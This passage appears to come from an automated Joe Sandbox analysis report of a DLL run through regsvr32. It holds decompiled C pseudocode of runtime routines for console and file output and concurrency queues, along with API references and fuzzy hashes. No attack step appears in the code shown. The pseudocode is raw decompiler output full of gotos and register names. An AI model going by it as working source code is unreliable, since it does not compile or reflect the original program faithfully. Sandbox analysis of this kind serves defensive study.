                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) +  *((intOrPtr*)(_t289 + 4));
                                                                                                        				goto 0x123e0db8;
                                                                                                        				if (_t345 <= 0) goto 0x123e0d8d;
                                                                                                        				_t327 = _t329;
                                                                                                        				_t361 =  *(_t336 - 0x19) >> 6;
                                                                                                        				_t356 =  *(_t336 - 0x11) +  *(_t336 - 0x11) * 8;
                                                                                                        				 *((char*)( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t361 * 8)) + _t356 * 8 + _t327 + 0x3e)) =  *((intOrPtr*)(_t327 + _t335));
                                                                                                        				_t328 = _t327 + 1;
                                                                                                        				if (2 - _t345 < 0) goto 0x123e0d6d;
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) =  *((intOrPtr*)(_t289 + 4)) + r8d;
                                                                                                        				goto 0x123e0db8;
                                                                                                        				 *((char*)(_t356 + 0x3e + _t375 * 8)) =  *_t335;
                                                                                                        				 *( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) =  *( *((intOrPtr*)(0x7ffc123d0000 + 0x7f940 + _t361 * 8)) + 0x3d + _t375 * 8) | 0x00000004;
                                                                                                        				_t174 = _t328 + 1; // 0x1
                                                                                                        				 *((intOrPtr*)(_t289 + 4)) = _t174;
                                                                                                        				goto 0x123e0db8;
                                                                                                        				 *_t289 = GetLastError();
                                                                                                        				return E00007FFC7FFC123D3A70(_t206,  *((intOrPtr*)(_t336 - 0x61)),  *((intOrPtr*)(_t289 + 4)),  *(_t336 + 0x17) ^ _t338);
                                                                                                        			}



















































                                                                                                        0x7ffc123e0958
                                                                                                        0x7ffc123e0966
                                                                                                        0x7ffc123e096a
                                                                                                        0x7ffc123e0971
                                                                                                        0x7ffc123e0979
                                                                                                        0x7ffc123e097d
                                                                                                        0x7ffc123e0987
                                                                                                        0x7ffc123e098e
                                                                                                        0x7ffc123e0995
                                                                                                        0x7ffc123e0998
                                                                                                        0x7ffc123e099c
                                                                                                        0x7ffc123e09a3
                                                                                                        0x7ffc123e09aa
                                                                                                        0x7ffc123e09ae
                                                                                                        0x7ffc123e09bc
                                                                                                        0x7ffc123e09c0
                                                                                                        0x7ffc123e09cc
                                                                                                        0x7ffc123e09d1
                                                                                                        0x7ffc123e09d5
                                                                                                        0x7ffc123e09d8
                                                                                                        0x7ffc123e09db
                                                                                                        0x7ffc123e09e5
                                                                                                        0x7ffc123e09ee
                                                                                                        0x7ffc123e09f3
                                                                                                        0x7ffc123e09f8
                                                                                                        0x7ffc123e09fc
                                                                                                        0x7ffc123e0a00
                                                                                                        0x7ffc123e0a06
                                                                                                        0x7ffc123e0a09
                                                                                                        0x7ffc123e0a10
                                                                                                        0x7ffc123e0a19
                                                                                                        0x7ffc123e0a1d
                                                                                                        0x7ffc123e0a25
                                                                                                        0x7ffc123e0a29
                                                                                                        0x7ffc123e0a2c
                                                                                                        0x7ffc123e0a40
                                                                                                        0x7ffc123e0a5b
                                                                                                        0x7ffc123e0a64
                                                                                                        0x7ffc123e0a68
                                                                                                        0x7ffc123e0a72
                                                                                                        0x7ffc123e0a77
                                                                                                        0x7ffc123e0a8f
                                                                                                        0x7ffc123e0a98
                                                                                                        0x7ffc123e0a9e
                                                                                                        0x7ffc123e0aa0
                                                                                                        0x7ffc123e0aaa
                                                                                                        0x7ffc123e0ab0
                                                                                                        0x7ffc123e0ab6
                                                                                                        0x7ffc123e0abc
                                                                                                        0x7ffc123e0ac9
                                                                                                        0x7ffc123e0ace
                                                                                                        0x7ffc123e0ada
                                                                                                        0x7ffc123e0aea
                                                                                                        0x7ffc123e0af8
                                                                                                        0x7ffc123e0b03
                                                                                                        0x7ffc123e0b05
                                                                                                        0x7ffc123e0b09
                                                                                                        0x7ffc123e0b0d
                                                                                                        0x7ffc123e0b1a
                                                                                                        0x7ffc123e0b1c
                                                                                                        0x7ffc123e0b1f
                                                                                                        0x7ffc123e0b22
                                                                                                        0x7ffc123e0b33
                                                                                                        0x7ffc123e0b3c
                                                                                                        0x7ffc123e0b4a
                                                                                                        0x7ffc123e0b4d
                                                                                                        0x7ffc123e0b55
                                                                                                        0x7ffc123e0b5e
                                                                                                        0x7ffc123e0b66
                                                                                                        0x7ffc123e0b6f
                                                                                                        0x7ffc123e0b75
                                                                                                        0x7ffc123e0b79
                                                                                                        0x7ffc123e0b85
                                                                                                        0x7ffc123e0b87
                                                                                                        0x7ffc123e0b8a
                                                                                                        0x7ffc123e0b8d
                                                                                                        0x7ffc123e0b91
                                                                                                        0x7ffc123e0ba2
                                                                                                        0x7ffc123e0bab
                                                                                                        0x7ffc123e0bb1
                                                                                                        0x7ffc123e0bb4
                                                                                                        0x7ffc123e0bbb
                                                                                                        0x7ffc123e0bc0
                                                                                                        0x7ffc123e0bc4
                                                                                                        0x7ffc123e0bcc
                                                                                                        0x7ffc123e0bd4
                                                                                                        0x7ffc123e0bdb
                                                                                                        0x7ffc123e0be0
                                                                                                        0x7ffc123e0be6
                                                                                                        0x7ffc123e0beb
                                                                                                        0x7ffc123e0bf5
                                                                                                        0x7ffc123e0bf7
                                                                                                        0x7ffc123e0c07
                                                                                                        0x7ffc123e0c09
                                                                                                        0x7ffc123e0c11
                                                                                                        0x7ffc123e0c1a
                                                                                                        0x7ffc123e0c2f
                                                                                                        0x7ffc123e0c35
                                                                                                        0x7ffc123e0c38
                                                                                                        0x7ffc123e0c47
                                                                                                        0x7ffc123e0c4f
                                                                                                        0x7ffc123e0c55
                                                                                                        0x7ffc123e0c58
                                                                                                        0x7ffc123e0c5d
                                                                                                        0x7ffc123e0c62
                                                                                                        0x7ffc123e0c6a
                                                                                                        0x7ffc123e0c6e
                                                                                                        0x7ffc123e0c73
                                                                                                        0x7ffc123e0c76
                                                                                                        0x7ffc123e0c7f
                                                                                                        0x7ffc123e0c84
                                                                                                        0x7ffc123e0c89
                                                                                                        0x7ffc123e0c8f
                                                                                                        0x7ffc123e0c98
                                                                                                        0x7ffc123e0cae
                                                                                                        0x7ffc123e0cbc
                                                                                                        0x7ffc123e0cc3
                                                                                                        0x7ffc123e0cce
                                                                                                        0x7ffc123e0cd5
                                                                                                        0x7ffc123e0cda
                                                                                                        0x7ffc123e0ce3
                                                                                                        0x7ffc123e0ce3
                                                                                                        0x7ffc123e0ce7
                                                                                                        0x7ffc123e0cf7
                                                                                                        0x7ffc123e0d01
                                                                                                        0x7ffc123e0d07
                                                                                                        0x7ffc123e0d0a
                                                                                                        0x7ffc123e0d14
                                                                                                        0x7ffc123e0d1e
                                                                                                        0x7ffc123e0d22
                                                                                                        0x7ffc123e0d2a
                                                                                                        0x7ffc123e0d2c
                                                                                                        0x7ffc123e0d3e
                                                                                                        0x7ffc123e0d4e
                                                                                                        0x7ffc123e0d50
                                                                                                        0x7ffc123e0d53
                                                                                                        0x7ffc123e0d58
                                                                                                        0x7ffc123e0d5a
                                                                                                        0x7ffc123e0d61
                                                                                                        0x7ffc123e0d69
                                                                                                        0x7ffc123e0d7c
                                                                                                        0x7ffc123e0d82
                                                                                                        0x7ffc123e0d8b
                                                                                                        0x7ffc123e0d8d
                                                                                                        0x7ffc123e0d91
                                                                                                        0x7ffc123e0d95
                                                                                                        0x7ffc123e0da2
                                                                                                        0x7ffc123e0da8
                                                                                                        0x7ffc123e0dab
                                                                                                        0x7ffc123e0dae
                                                                                                        0x7ffc123e0db6
                                                                                                        0x7ffc123e0de1

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                        • String ID:
                                                                                                        • API String ID: 2718003287-0
                                                                                                        • Opcode ID: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                        • Instruction ID: 9371a17db41541b0c0ac3b8792bc0bbafb3e3f20ea73669f92b6b45d34deb883
                                                                                                        • Opcode Fuzzy Hash: d78e05eaa4b6556e9331e54f8ea1fb34517351267b85fce0062fd028625cc37f
                                                                                                        • Instruction Fuzzy Hash: F3D11536B08A9989E710CF78D4402ED77B5FB847A8B904272CF4D67B99CE78D42AC710
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 29%
                                                                                                        			E00007FFC7FFC123E129C(void* __ebx, signed int __ecx, void* __ebp, void* __esp, void* __rax, void* __rcx, signed short* __rdx, void* __r8, signed int __r9, void* __r10) {
                                                                                                        				signed short _v80;
                                                                                                        				void* _v92;
                                                                                                        				signed int _v96;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				long _v112;
                                                                                                        				signed int _v120;
                                                                                                        				long long _v128;
                                                                                                        				signed int _v136;
                                                                                                        				void* __rbx;
                                                                                                        				void* __rsi;
                                                                                                        				void* __rbp;
                                                                                                        				void* _t107;
                                                                                                        				long _t116;
                                                                                                        				signed int _t117;
                                                                                                        				void* _t122;
                                                                                                        				signed int _t128;
                                                                                                        				intOrPtr _t146;
                                                                                                        				intOrPtr _t147;
                                                                                                        				void* _t169;
                                                                                                        				signed long long _t182;
                                                                                                        				signed long long _t186;
                                                                                                        				signed long long _t189;
                                                                                                        				signed long long _t208;
                                                                                                        				signed int _t209;
                                                                                                        				void* _t210;
                                                                                                        				void* _t212;
                                                                                                        				void* _t228;
                                                                                                        				signed long long _t229;
                                                                                                        				signed short* _t230;
                                                                                                        				void* _t231;
                                                                                                        				signed short* _t232;
                                                                                                        
                                                                                                        				_t122 = __ebx;
                                                                                                        				r15d = r8d;
                                                                                                        				_t186 = __r9;
                                                                                                        				_t230 = __rdx;
                                                                                                        				if (r8d == 0) goto 0x123e1599;
                                                                                                        				if (__rdx != 0) goto 0x123e1303;
                                                                                                        				 *((char*)(__r9 + 0x38)) = 1;
                                                                                                        				r8d = 0;
                                                                                                        				 *((intOrPtr*)(__r9 + 0x34)) = 0;
                                                                                                        				 *((char*)(__r9 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(__r9 + 0x2c)) = 0x16;
                                                                                                        				r9d = 0;
                                                                                                        				_v128 = __r9;
                                                                                                        				_v136 = _t209;
                                                                                                        				E00007FFC7FFC123D9674(__rax, __r9, __rcx, __rdx, _t210, _t212, __r8);
                                                                                                        				goto 0x123e159b;
                                                                                                        				_t189 = __ecx >> 6;
                                                                                                        				_v120 = _t189;
                                                                                                        				_t229 = __ecx + __ecx * 8;
                                                                                                        				if (_t210 - 1 - 1 > 0) goto 0x123e1339;
                                                                                                        				if (( !r15d & 0x00000001) == 0) goto 0x123e12cc;
                                                                                                        				if (( *( *((intOrPtr*)(0x1244f940 + _t189 * 8)) + 0x38 + _t229 * 8) & 0x00000020) == 0) goto 0x123e134f;
                                                                                                        				r8d = 0x7ffc1244f942;
                                                                                                        				E00007FFC7FFC123E1E38(r12d);
                                                                                                        				_v96 = _t209;
                                                                                                        				if (E00007FFC7FFC123E16A0(r12d, __ecx) == 0) goto 0x123e1485;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(0x1244f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x123e1485;
                                                                                                        				if ( *((intOrPtr*)(__r9 + 0x28)) != dil) goto 0x123e1396;
                                                                                                        				0x123d9140();
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(__r9 + 0x18)) + 0x138)) != _t209) goto 0x123e13b2;
                                                                                                        				_t182 =  *((intOrPtr*)(0x1244f940 + _v120 * 8));
                                                                                                        				if ( *((intOrPtr*)(_t182 + 0x39 + _t229 * 8)) == dil) goto 0x123e1485;
                                                                                                        				if (GetConsoleMode(??, ??) == 0) goto 0x123e147a;
                                                                                                        				if (sil == 0) goto 0x123e1457;
                                                                                                        				sil = sil - 1;
                                                                                                        				if (sil - 1 > 0) goto 0x123e151e;
                                                                                                        				_t228 = _t230 + _t231;
                                                                                                        				_v112 = _t209;
                                                                                                        				_t232 = _t230;
                                                                                                        				if (_t230 - _t228 >= 0) goto 0x123e1514;
                                                                                                        				_v80 =  *_t232 & 0x0000ffff;
                                                                                                        				_t107 = E00007FFC7FFC123E1E40( *_t232 & 0xffff);
                                                                                                        				_t128 = _v80 & 0x0000ffff;
                                                                                                        				if (_t107 != _t128) goto 0x123e1449;
                                                                                                        				_t146 = _v108 + 2;
                                                                                                        				_v108 = _t146;
                                                                                                        				if (_t128 != 0xa) goto 0x123e143a;
                                                                                                        				if (E00007FFC7FFC123E1E40(0xd) != 0xd) goto 0x123e1449;
                                                                                                        				_t147 = _t146 + 1;
                                                                                                        				_v108 = _t147;
                                                                                                        				if ( &(_t232[1]) - _t228 >= 0) goto 0x123e1514;
                                                                                                        				goto 0x123e13fa;
                                                                                                        				_v112 = GetLastError();
                                                                                                        				goto 0x123e1514;
                                                                                                        				r9d = r15d;
                                                                                                        				_v136 = __r9;
                                                                                                        				E00007FFC7FFC123E0958(0xd, r12d, _t147, __ebp, __esp, __r9,  &_v112, _t230);
                                                                                                        				asm("movsd xmm0, [eax]");
                                                                                                        				goto 0x123e1519;
                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(0x1244f940 + _v120 * 8)) + 0x38 + _t229 * 8)) - dil >= 0) goto 0x123e14e1;
                                                                                                        				_t169 = sil;
                                                                                                        				if (_t169 == 0) goto 0x123e14cd;
                                                                                                        				if (_t169 == 0) goto 0x123e14b9;
                                                                                                        				if (_t147 - 1 != 1) goto 0x123e1529;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC123E0EE8(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x123e146e;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC123E1004(r12d,  *((intOrPtr*)(_t182 + 8)), _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x123e146e;
                                                                                                        				r9d = r15d;
                                                                                                        				E00007FFC7FFC123E0DE4(_t122, r12d, _t182, _t186,  &_v112, _t212, _t230);
                                                                                                        				goto 0x123e146e;
                                                                                                        				r8d = r15d;
                                                                                                        				_v136 = _v136 & _t182;
                                                                                                        				_v112 = _t182;
                                                                                                        				_v104 = 0;
                                                                                                        				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x123e1511;
                                                                                                        				_t116 = GetLastError();
                                                                                                        				_v112 = _t116;
                                                                                                        				asm("movsd xmm0, [ebp-0x30]");
                                                                                                        				asm("movsd [ebp-0x20], xmm0");
                                                                                                        				if (_t116 != 0) goto 0x123e1592;
                                                                                                        				_t117 = _v96;
                                                                                                        				if (_t117 == 0) goto 0x123e1568;
                                                                                                        				if (_t117 != 5) goto 0x123e1558;
                                                                                                        				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t186 + 0x2c)) = 9;
                                                                                                        				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                        				 *(_t186 + 0x34) = _t117;
                                                                                                        				goto 0x123e12fb;
                                                                                                        				_t208 = _t186;
                                                                                                        				E00007FFC7FFC123DB3DC(_v96, _t208);
                                                                                                        				goto 0x123e12fb;
                                                                                                        				if (( *( *((intOrPtr*)(0x1244f940 + _t208 * 8)) + 0x38 + _t229 * 8) & 0x00000040) == 0) goto 0x123e157a;
                                                                                                        				if ( *_t230 == 0x1a) goto 0x123e1599;
                                                                                                        				 *(_t186 + 0x34) =  *(_t186 + 0x34) & 0x00000000;
                                                                                                        				 *((char*)(_t186 + 0x30)) = 1;
                                                                                                        				 *((intOrPtr*)(_t186 + 0x2c)) = 0x1c;
                                                                                                        				 *((char*)(_t186 + 0x38)) = 1;
                                                                                                        				goto 0x123e12fb;
                                                                                                        				goto 0x123e159b;
                                                                                                        				return 0;
                                                                                                        			}



































                                                                                                        0x7ffc123e129c
                                                                                                        0x7ffc123e12b2
                                                                                                        0x7ffc123e12b8
                                                                                                        0x7ffc123e12bb
                                                                                                        0x7ffc123e12c1
                                                                                                        0x7ffc123e12ca
                                                                                                        0x7ffc123e12cc
                                                                                                        0x7ffc123e12d1
                                                                                                        0x7ffc123e12d4
                                                                                                        0x7ffc123e12da
                                                                                                        0x7ffc123e12e1
                                                                                                        0x7ffc123e12e9
                                                                                                        0x7ffc123e12ec
                                                                                                        0x7ffc123e12f1
                                                                                                        0x7ffc123e12f6
                                                                                                        0x7ffc123e12fe
                                                                                                        0x7ffc123e1313
                                                                                                        0x7ffc123e1317
                                                                                                        0x7ffc123e131b
                                                                                                        0x7ffc123e132e
                                                                                                        0x7ffc123e1337
                                                                                                        0x7ffc123e133f
                                                                                                        0x7ffc123e1346
                                                                                                        0x7ffc123e134a
                                                                                                        0x7ffc123e1352
                                                                                                        0x7ffc123e1368
                                                                                                        0x7ffc123e1377
                                                                                                        0x7ffc123e1381
                                                                                                        0x7ffc123e1386
                                                                                                        0x7ffc123e13a1
                                                                                                        0x7ffc123e13a3
                                                                                                        0x7ffc123e13ac
                                                                                                        0x7ffc123e13c7
                                                                                                        0x7ffc123e13d0
                                                                                                        0x7ffc123e13d6
                                                                                                        0x7ffc123e13dd
                                                                                                        0x7ffc123e13e3
                                                                                                        0x7ffc123e13e7
                                                                                                        0x7ffc123e13eb
                                                                                                        0x7ffc123e13f1
                                                                                                        0x7ffc123e1401
                                                                                                        0x7ffc123e1405
                                                                                                        0x7ffc123e140a
                                                                                                        0x7ffc123e1411
                                                                                                        0x7ffc123e1413
                                                                                                        0x7ffc123e1416
                                                                                                        0x7ffc123e141d
                                                                                                        0x7ffc123e1431
                                                                                                        0x7ffc123e1433
                                                                                                        0x7ffc123e1435
                                                                                                        0x7ffc123e1441
                                                                                                        0x7ffc123e1447
                                                                                                        0x7ffc123e144f
                                                                                                        0x7ffc123e1452
                                                                                                        0x7ffc123e1457
                                                                                                        0x7ffc123e145a
                                                                                                        0x7ffc123e1469
                                                                                                        0x7ffc123e146e
                                                                                                        0x7ffc123e1475
                                                                                                        0x7ffc123e148e
                                                                                                        0x7ffc123e1492
                                                                                                        0x7ffc123e1495
                                                                                                        0x7ffc123e149a
                                                                                                        0x7ffc123e149f
                                                                                                        0x7ffc123e14a5
                                                                                                        0x7ffc123e14b2
                                                                                                        0x7ffc123e14b7
                                                                                                        0x7ffc123e14b9
                                                                                                        0x7ffc123e14c6
                                                                                                        0x7ffc123e14cb
                                                                                                        0x7ffc123e14cd
                                                                                                        0x7ffc123e14da
                                                                                                        0x7ffc123e14df
                                                                                                        0x7ffc123e14ec
                                                                                                        0x7ffc123e14ef
                                                                                                        0x7ffc123e14f7
                                                                                                        0x7ffc123e14fb
                                                                                                        0x7ffc123e1506
                                                                                                        0x7ffc123e1508
                                                                                                        0x7ffc123e150e
                                                                                                        0x7ffc123e1514
                                                                                                        0x7ffc123e1519
                                                                                                        0x7ffc123e1533
                                                                                                        0x7ffc123e1535
                                                                                                        0x7ffc123e153a
                                                                                                        0x7ffc123e153f
                                                                                                        0x7ffc123e1541
                                                                                                        0x7ffc123e1545
                                                                                                        0x7ffc123e154c
                                                                                                        0x7ffc123e1550
                                                                                                        0x7ffc123e1553
                                                                                                        0x7ffc123e155b
                                                                                                        0x7ffc123e155e
                                                                                                        0x7ffc123e1563
                                                                                                        0x7ffc123e1572
                                                                                                        0x7ffc123e1578
                                                                                                        0x7ffc123e157a
                                                                                                        0x7ffc123e157e
                                                                                                        0x7ffc123e1582
                                                                                                        0x7ffc123e1589
                                                                                                        0x7ffc123e158d
                                                                                                        0x7ffc123e1597
                                                                                                        0x7ffc123e15ab

                                                                                                        APIs
                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFC123E123C), ref: 00007FFC123E13BF
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00007FFC123E123C), ref: 00007FFC123E1449
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ConsoleErrorLastMode
                                                                                                        • String ID:
                                                                                                        • API String ID: 953036326-0
                                                                                                        • Opcode ID: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                        • Instruction ID: 95c2046f039b0747d5d63d54b57c49b454cc799a624a7f1533358ba5bb3cad64
                                                                                                        • Opcode Fuzzy Hash: da2f82535048981fdee2fbb5626fefef0911d61da315dbd697428ec573955214
                                                                                                        • Instruction Fuzzy Hash: EB911766B18E6A85FB50CB6584406FD27B8BB847A8F840175DF8E53784CFB8D869C720
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 47%
                                                                                                        			E00007FFC7FFC123D1CE0(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				intOrPtr* _t48;
                                                                                                        				intOrPtr* _t50;
                                                                                                        				intOrPtr* _t52;
                                                                                                        				intOrPtr _t62;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC123D2250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x123d1d3a;
                                                                                                        				E00007FFC7FFC123D18F0(__rax, _a8);
                                                                                                        				_t48 = _a16 - __rax;
                                                                                                        				E00007FFC7FFC123D1DF0(_t48, _a8, _a8, _t48, _a24);
                                                                                                        				goto 0x123d1de7;
                                                                                                        				E00007FFC7FFC123D2170(_t48, _a8);
                                                                                                        				_t62 =  *0x1244a228; // 0xffffffffffffffff
                                                                                                        				_t50 = _t62 -  *_t48;
                                                                                                        				if (_t50 - _a24 > 0) goto 0x123d1d65;
                                                                                                        				E00007FFC7FFC123D2230(_a8);
                                                                                                        				E00007FFC7FFC123D2170(_t50, _a8);
                                                                                                        				_t52 =  *_t50 + _a24;
                                                                                                        				_v24 = _t52;
                                                                                                        				if (_a24 <= 0) goto 0x123d1de2;
                                                                                                        				r8d = 0;
                                                                                                        				if ((E00007FFC7FFC123D22B0(_t52, _a8, _v24) & 0x000000ff) == 0) goto 0x123d1de2;
                                                                                                        				E00007FFC7FFC123D18F0(_t52, _a8);
                                                                                                        				_v16 = _t52;
                                                                                                        				E00007FFC7FFC123D2170(_t52, _a8);
                                                                                                        				E00007FFC7FFC123D11E0(_v16 +  *_t52, _a16, _a24);
                                                                                                        				return E00007FFC7FFC123D23A0(_v16 +  *_t52, _a8, _v24);
                                                                                                        			}









                                                                                                        0x7ffc123d1ce0
                                                                                                        0x7ffc123d1ce5
                                                                                                        0x7ffc123d1cea
                                                                                                        0x7ffc123d1d07
                                                                                                        0x7ffc123d1d0e
                                                                                                        0x7ffc123d1d1b
                                                                                                        0x7ffc123d1d30
                                                                                                        0x7ffc123d1d35
                                                                                                        0x7ffc123d1d3f
                                                                                                        0x7ffc123d1d47
                                                                                                        0x7ffc123d1d51
                                                                                                        0x7ffc123d1d59
                                                                                                        0x7ffc123d1d60
                                                                                                        0x7ffc123d1d6a
                                                                                                        0x7ffc123d1d72
                                                                                                        0x7ffc123d1d77
                                                                                                        0x7ffc123d1d82
                                                                                                        0x7ffc123d1d84
                                                                                                        0x7ffc123d1d9b
                                                                                                        0x7ffc123d1da2
                                                                                                        0x7ffc123d1da7
                                                                                                        0x7ffc123d1db1
                                                                                                        0x7ffc123d1dce
                                                                                                        0x7ffc123d1deb

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D226B
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1D0E
                                                                                                          • Part of subcall function 00007FFC123D18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D18FE
                                                                                                          • Part of subcall function 00007FFC123D1DF0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D1E56
                                                                                                          • Part of subcall function 00007FFC123D1DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1E98
                                                                                                          • Part of subcall function 00007FFC123D1DF0: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1EAC
                                                                                                          • Part of subcall function 00007FFC123D1DF0: char_traits.LIBCPMTD ref: 00007FFC123D1EDB
                                                                                                        • _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFC123D1D60
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1DA2
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D1DCE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$Mtx_guardMtx_guard::~_char_traits$EmptyQueue::Structured
                                                                                                        • String ID:
                                                                                                        • API String ID: 3922470843-0
                                                                                                        • Opcode ID: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
                                                                                                        • Instruction ID: 4fb6a0b5460c49f9d05ed96c382bf6b150adef42d93bb05c837a4ee26446d6fc
                                                                                                        • Opcode Fuzzy Hash: 9dc5e077f87c3be6b44e717f9175d65acc51dec95d13604ab53f14413601f7af
                                                                                                        • Instruction Fuzzy Hash: 0621FE2A618E9D82DA50DB56E4501BEA374FBC5BE0F904072FBCD47B6ACE6DD410CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 50%
                                                                                                        			E00007FFC7FFC123D1DF0(intOrPtr* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32) {
                                                                                                        				long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				long long _v40;
                                                                                                        				void* _t44;
                                                                                                        				intOrPtr* _t49;
                                                                                                        				intOrPtr* _t51;
                                                                                                        				long long _t53;
                                                                                                        				intOrPtr* _t54;
                                                                                                        				intOrPtr _t61;
                                                                                                        
                                                                                                        				_t49 = __rax;
                                                                                                        				_a32 = __r9;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				E00007FFC7FFC123D21F0(_t44, __rax, _a16, _a24);
                                                                                                        				E00007FFC7FFC123D2400(_t44, __rax, _a16, _a24, _a32);
                                                                                                        				_a32 = _t49;
                                                                                                        				E00007FFC7FFC123D2170(_t49, _a8);
                                                                                                        				_t61 =  *0x1244a228; // 0xffffffffffffffff
